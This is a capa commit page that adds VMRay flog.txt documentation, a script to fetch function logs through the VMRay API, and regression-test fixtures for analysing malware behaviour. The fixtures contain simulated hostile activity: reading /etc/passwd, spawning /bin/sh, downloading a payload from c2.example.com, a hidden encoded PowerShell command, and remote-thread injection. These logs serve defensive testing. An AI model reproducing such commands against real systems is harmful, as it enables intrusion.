Skip to content

Commit b58fbeb

Browse files
committed
vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt
Addresses reviewer feedback on #2878: 1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size). 2. Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it. 3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files: - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped) - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear). Fixes #2878
1 parent eca9286 commit b58fbeb

File tree

7 files changed

+709
-11
lines changed

7 files changed

+709
-11
lines changed

CHANGELOG.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,7 @@
66

77
- ghidra: support PyGhidra @mike-hunhoff #2788
88
- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
9+
- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
910
- vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
1011

1112
### Breaking Changes

doc/usage.md

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,36 @@ See `capa -h` for all supported arguments and usage examples.
1212
| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output |
1313
| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar |
1414

15+
## VMRay: flog.txt vs full analysis archive
16+
17+
When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
18+
Choose based on what you have access to and what features you need.
19+
20+
| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
21+
|-|-|-|
22+
| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
23+
| **File size** | Small text file | Large encrypted ZIP |
24+
| **Dynamic API calls** |||
25+
| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
26+
| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
27+
| **Static imports / exports** |||
28+
| **PE/ELF section names** |||
29+
| **Embedded file strings** |||
30+
| **Base address** |||
31+
| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
32+
33+
**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
34+
35+
**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
36+
37+
```
38+
# flog.txt — free, limited to dynamic API calls
39+
capa path/to/flog.txt
40+
41+
# Full VMRay archive — requires subscription, richer features
42+
capa path/to/analysis_archive.zip
43+
```
44+
1545
## tips and tricks
1646

1747
### only run selected rules

scripts/fetch-vmray-flog.py

Lines changed: 270 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,270 @@
1+
#!/usr/bin/env python3
2+
# Copyright 2025 Google LLC
3+
#
4+
# Licensed under the Apache License, Version 2.0 (the "License");
5+
# you may not use this file except in compliance with the License.
6+
# You may obtain a copy of the License at
7+
#
8+
# http://www.apache.org/licenses/LICENSE-2.0
9+
#
10+
# Unless required by applicable law or agreed to in writing, software
11+
# distributed under the License is distributed on an "AS IS" BASIS,
12+
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13+
# See the License for the specific language governing permissions and
14+
# limitations under the License.
15+
16+
"""
17+
Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
18+
19+
Given a sample SHA-256 hash and VMRay credentials, this script:
20+
1. Looks up the sample on the VMRay instance.
21+
2. Finds the most-recent analysis for that sample.
22+
3. Downloads the flog.txt (Download Function Log) from the analysis archive.
23+
4. Optionally runs capa against the downloaded file.
24+
25+
Requirements:
26+
pip install requests
27+
28+
Usage::
29+
30+
python scripts/fetch-vmray-flog.py \\
31+
--url https://your-vmray.example.com \\
32+
--apikey YOUR_API_KEY \\
33+
--sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
34+
--output /tmp/sample_flog.txt
35+
36+
# Fetch and immediately run capa:
37+
python scripts/fetch-vmray-flog.py \\
38+
--url https://your-vmray.example.com \\
39+
--apikey YOUR_API_KEY \\
40+
--sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
41+
--run-capa
42+
43+
VMRay API reference:
44+
https://docs.vmray.com/documents/api-reference/
45+
46+
Note: this script requires a VMRay account. The flog.txt itself is freely available
47+
("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
48+
programmatically via the REST API requires valid API credentials.
49+
"""
50+
51+
import argparse
52+
import logging
53+
import subprocess
54+
import sys
55+
from pathlib import Path
56+
57+
import requests
58+
59+
logger = logging.getLogger(__name__)
60+
61+
# ---------------------------------------------------------------------------
62+
# VMRay REST API helpers
63+
# ---------------------------------------------------------------------------
64+
65+
_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
66+
67+
68+
def _session(url: str, apikey: str) -> requests.Session:
69+
"""Return an authenticated requests.Session for the given VMRay instance."""
70+
s = requests.Session()
71+
s.headers.update(
72+
{
73+
"Authorization": f"api_key {apikey}",
74+
"Accept": "application/json",
75+
}
76+
)
77+
s.verify = True # set to False only when using self-signed certificates
78+
s.base_url = url.rstrip("/") # type: ignore[attr-defined]
79+
return s
80+
81+
82+
def _get(session: requests.Session, path: str, **kwargs) -> dict:
83+
url = f"{session.base_url}{path}" # type: ignore[attr-defined]
84+
resp = session.get(url, **kwargs)
85+
resp.raise_for_status()
86+
return resp.json()
87+
88+
89+
def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
90+
url = f"{session.base_url}{path}" # type: ignore[attr-defined]
91+
resp = session.get(url, **kwargs)
92+
resp.raise_for_status()
93+
return resp.content
94+
95+
96+
def lookup_sample(session: requests.Session, sha256: str) -> dict:
97+
"""
98+
Return the VMRay sample record for the given SHA-256.
99+
Raises ValueError if the sample is not found.
100+
"""
101+
data = _get(session, f"/rest/sample/sha256/{sha256}")
102+
if data.get("result") != "ok" or not data.get("data"):
103+
raise ValueError(f"sample not found on VMRay instance: {sha256}")
104+
# data["data"] is a list; take the first entry
105+
return data["data"][0]
106+
107+
108+
def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
109+
"""
110+
Return the most-recent finished analysis for the given VMRay sample ID.
111+
Raises ValueError if no analysis is found.
112+
"""
113+
data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
114+
analyses = data.get("data", [])
115+
if not analyses:
116+
raise ValueError(f"no analyses found for sample_id={sample_id}")
117+
# Sort by analysis_id descending (newest first)
118+
analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
119+
return analyses[0]
120+
121+
122+
def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
123+
"""
124+
Download the flog.txt content for the given VMRay analysis ID.
125+
126+
VMRay exposes the function log via the analysis archive endpoint.
127+
We request only the flog_txt entry from the archive using the
128+
``file_filter`` query parameter.
129+
"""
130+
# Try the dedicated log endpoint first (VMRay >= 2024.x)
131+
try:
132+
content = _get_bytes(
133+
session,
134+
f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
135+
)
136+
if content:
137+
return content
138+
except requests.HTTPError:
139+
pass
140+
141+
# Fallback: download via the analysis archive with a file filter
142+
content = _get_bytes(
143+
session,
144+
f"/rest/analysis/{analysis_id}/archive",
145+
params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
146+
)
147+
return content
148+
149+
150+
# ---------------------------------------------------------------------------
151+
# main
152+
# ---------------------------------------------------------------------------
153+
154+
155+
def main(argv=None):
156+
if argv is None:
157+
argv = sys.argv[1:]
158+
159+
parser = argparse.ArgumentParser(
160+
description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
161+
)
162+
parser.add_argument(
163+
"--url",
164+
required=True,
165+
metavar="URL",
166+
help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
167+
)
168+
parser.add_argument(
169+
"--apikey",
170+
required=True,
171+
metavar="KEY",
172+
help="VMRay REST API key (Settings → API Keys).",
173+
)
174+
parser.add_argument(
175+
"--sha256",
176+
required=True,
177+
metavar="SHA256",
178+
help="SHA-256 hash of the sample to analyse.",
179+
)
180+
parser.add_argument(
181+
"--output",
182+
metavar="PATH",
183+
help="Where to save the downloaded flog.txt. Defaults to <sha256>_flog.txt in the current directory.",
184+
)
185+
parser.add_argument(
186+
"--run-capa",
187+
action="store_true",
188+
dest="run_capa",
189+
help="After downloading, run 'capa <output>' and print the results.",
190+
)
191+
parser.add_argument(
192+
"--capa-args",
193+
metavar="ARGS",
194+
default="",
195+
help="Extra arguments forwarded to capa (only used with --run-capa).",
196+
)
197+
parser.add_argument(
198+
"--no-verify-ssl",
199+
action="store_false",
200+
dest="verify_ssl",
201+
help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
202+
)
203+
parser.add_argument(
204+
"-d", "--debug", action="store_true", help="Enable debug logging."
205+
)
206+
args = parser.parse_args(argv)
207+
208+
logging.basicConfig(
209+
level=logging.DEBUG if args.debug else logging.INFO,
210+
format="%(levelname)s: %(message)s",
211+
)
212+
213+
output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
214+
215+
session = _session(args.url, args.apikey)
216+
session.verify = args.verify_ssl # type: ignore[assignment]
217+
218+
# Step 1 — look up sample
219+
logger.info("looking up sample %s …", args.sha256)
220+
try:
221+
sample = lookup_sample(session, args.sha256)
222+
except (requests.HTTPError, ValueError) as exc:
223+
logger.error("failed to find sample: %s", exc)
224+
return 1
225+
226+
sample_id: int = sample["sample_id"]
227+
logger.debug("found sample_id=%d", sample_id)
228+
229+
# Step 2 — find the latest analysis
230+
logger.info("fetching analysis list for sample_id=%d …", sample_id)
231+
try:
232+
analysis = get_latest_analysis(session, sample_id)
233+
except (requests.HTTPError, ValueError) as exc:
234+
logger.error("failed to find analysis: %s", exc)
235+
return 1
236+
237+
analysis_id: int = analysis["analysis_id"]
238+
logger.debug("using analysis_id=%d", analysis_id)
239+
240+
# Step 3 — download flog.txt
241+
logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
242+
try:
243+
flog_bytes = download_flog_txt(session, analysis_id)
244+
except requests.HTTPError as exc:
245+
logger.error("failed to download flog.txt: %s", exc)
246+
return 1
247+
248+
if not flog_bytes:
249+
logger.error(
250+
"received empty response — flog.txt may not be available for this analysis"
251+
)
252+
return 1
253+
254+
output_path.write_bytes(flog_bytes)
255+
logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
256+
257+
# Step 4 (optional) — run capa
258+
if args.run_capa:
259+
capa_cmd = ["capa", str(output_path)] + (
260+
args.capa_args.split() if args.capa_args else []
261+
)
262+
logger.info("running: %s", " ".join(capa_cmd))
263+
result = subprocess.run(capa_cmd)
264+
return result.returncode
265+
266+
return 0
267+
268+
269+
if __name__ == "__main__":
270+
sys.exit(main())
Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
# Log Creation Date: 02.01.2025 12:00:00
2+
# Analyzer Version: 2024.4.1
3+
# Flog Txt Version 1
4+
5+
Process:
6+
id = "1"
7+
os_pid = "0x1234"
8+
os_parent_pid = "0x1"
9+
parent_id = "0"
10+
image_name = "backdoor"
11+
filename = "/tmp/backdoor"
12+
cmd_line = "/tmp/backdoor"
13+
monitor_reason = "analysis_target"
14+
15+
Region:
16+
id = "1"
17+
name = "stack"
18+
19+
Thread:
20+
id = "1"
21+
os_tid = "0x1234"
22+
[0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
23+
[0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
24+
[0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
25+
[0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
26+
[0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
27+
[0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
28+
[0001.006] sys_fork () returned 0x2345
29+
[0001.007] sys_getuid () returned 0x0
30+
[0001.008] sys_setuid (uid=0x0) returned 0x0
31+
[0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
32+
[0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
33+
[0001.011] sys_time (tloc=0x0) returned 0x677f2000
34+
[0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
35+
[0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
36+
[0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
37+
[0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
38+
[0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
39+
[0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
40+
[0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
41+
[0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
42+
[0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
43+
[0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
# Log Creation Date: 03.01.2025 08:00:00
2+
# Analyzer Version: 2024.4.1
3+
# Flog Txt Version 1
4+
5+
Process:
6+
id = "1"
7+
os_pid = "0x2000"
8+
os_parent_pid = "0x4"
9+
parent_id = "0"
10+
image_name = "edgecase.exe"
11+
filename = "c:\\users\\test\\edgecase.exe"
12+
cmd_line = "edgecase.exe"
13+
monitor_reason = "analysis_target"
14+
15+
Region:
16+
id = "5"
17+
name = "private_0x0000000000010000"
18+
19+
Thread:
20+
id = "1"
21+
os_tid = "0x2100"
22+
[0001.000] GetCurrentProcess () returned 0xffffffffffffffff
23+
[0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
24+
[0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
25+
[0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
26+
[0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
27+
[0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
28+
[0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
29+
[0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
30+
[0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
31+
[0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
32+
[0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
33+
[0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
34+
[0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
35+
[0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
36+
[0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
37+
[0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200

0 commit comments

Comments
 (0)